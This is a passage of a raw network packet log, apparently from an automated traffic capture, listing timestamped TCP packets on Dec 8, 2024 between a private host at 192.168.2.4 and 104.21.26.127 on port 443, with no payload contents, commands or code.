                                                                                                                                Dec 8, 2024 01:47:06.507842064 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.507849932 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.507880926 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.512605906 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.512618065 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.512686014 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.512691975 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.512732983 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.518079996 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.518095016 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.518260002 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.518265963 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.518310070 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.523205996 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.523221016 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.523283958 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.523289919 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.523328066 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.539515972 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.539529085 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.539586067 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.539591074 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.539629936 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.546472073 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.546485901 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.546535969 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.546540976 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.546576977 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.551959038 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.551975012 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.552031994 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.552038908 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.552073956 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.565423012 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.565435886 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.565485001 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.565490007 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.565527916 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.699827909 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.699841976 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.699888945 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.699893951 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.699933052 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.704623938 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.704637051 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.704696894 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.704701900 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.704755068 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.710105896 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.710120916 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.710172892 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.710177898 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.710217953 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.715815067 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.715837955 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.715895891 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.715903997 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.715945005 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.732099056 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.732131958 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.732173920 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.732177973 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.732220888 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.738488913 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.738502026 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.738553047 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.738558054 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.738595963 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.744010925 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.744024038 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.744074106 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.744079113 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.744116068 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.748820066 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.748838902 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.748889923 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.748894930 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.748928070 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.891916990 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.891940117 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.891952991 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.891994953 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.891999006 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.892039061 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.897392035 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.897406101 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.897443056 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.897449017 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.897488117 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.902301073 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.902313948 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.902354956 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.902359962 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.902379036 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.902398109 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.907788992 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.907803059 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.907855034 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.907860041 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.907903910 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.924102068 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.924118996 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.924171925 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.924177885 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.924221039 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.930578947 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.930593967 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.930625916 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.930630922 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.930655003 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.930670023 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.936064959 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.936079979 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.936120987 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.936126947 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.936157942 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.940898895 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.940912962 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.940957069 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:06.940963984 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:06.941001892 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.084023952 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.084039927 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.084079981 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.084086895 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.084109068 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.084135056 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.089399099 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.089411974 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.089449883 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.089454889 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.089478016 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.089502096 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.094248056 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.094264030 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.094321012 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.094326019 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.094367027 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.100119114 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.100152969 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.100200891 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.100205898 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.100245953 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.116493940 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.116509914 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.116561890 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.116565943 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.116607904 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.122586012 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.122601986 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.122642040 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.122646093 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.122667074 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.122675896 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.128094912 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.128109932 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.128154993 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.128160000 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.128199100 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.133465052 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.133483887 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.133531094 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.133536100 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.133575916 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.276034117 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.276050091 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.276106119 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.276112080 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.276154995 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.281383038 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.281397104 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.281445026 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.281450033 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.281488895 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.286165953 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.286180019 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.286226034 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.286231041 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.286274910 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.297219992 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.297234058 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.297280073 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.297283888 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.297314882 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.317203999 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.317219019 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.317270041 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.317276001 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.317317963 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.322098970 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.322114944 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.322163105 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.322169065 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.322211027 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.327615976 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.327630043 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.327675104 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.327680111 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.327723026 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.332895041 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.332906961 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.332952976 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.332957029 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.332997084 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.467855930 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.467871904 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.467914104 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.467921019 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.467952967 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.467972040 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.473328114 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.473342896 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.473392010 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.473397017 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.473442078 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.478684902 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.478698969 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.478751898 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.478756905 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.478796959 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.489506006 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.489520073 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.489567995 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.489577055 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.489617109 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.509244919 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.509258986 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.509305954 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.509310007 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.509351015 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.514775991 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.514789104 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.514847040 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.514852047 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.514894009 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.519576073 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.519594908 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.519644022 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.519648075 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.519689083 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.524956942 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.524971962 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.525022030 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.525027037 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.525072098 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.660475016 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.660491943 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.660542011 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.660548925 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.660567999 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.660589933 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.665299892 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.665313959 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.665373087 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.665378094 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.665411949 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.670720100 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.670732021 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.670784950 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.670789957 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.670828104 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.681458950 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.681472063 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.681524992 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.681529999 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.681569099 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.701297998 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.701312065 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.701359034 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.701364040 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.701404095 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.706779003 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.706793070 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.706841946 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.706846952 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.706892014 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.711637020 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.711649895 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.711699009 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.711704016 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.711746931 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.717070103 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.717086077 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.717134953 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.717140913 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.717183113 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.853682995 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.853702068 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.853760958 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.853768110 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.853806019 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.858450890 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.858465910 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.858513117 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.858516932 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.858555079 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.862862110 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.862884045 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.862910032 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.862915039 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.862936020 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.862956047 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.873426914 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.873441935 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.873480082 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.873487949 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.873498917 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.873523951 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.893342972 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.893357038 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.893403053 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.893408060 CET44349979104.21.26.127192.168.2.4
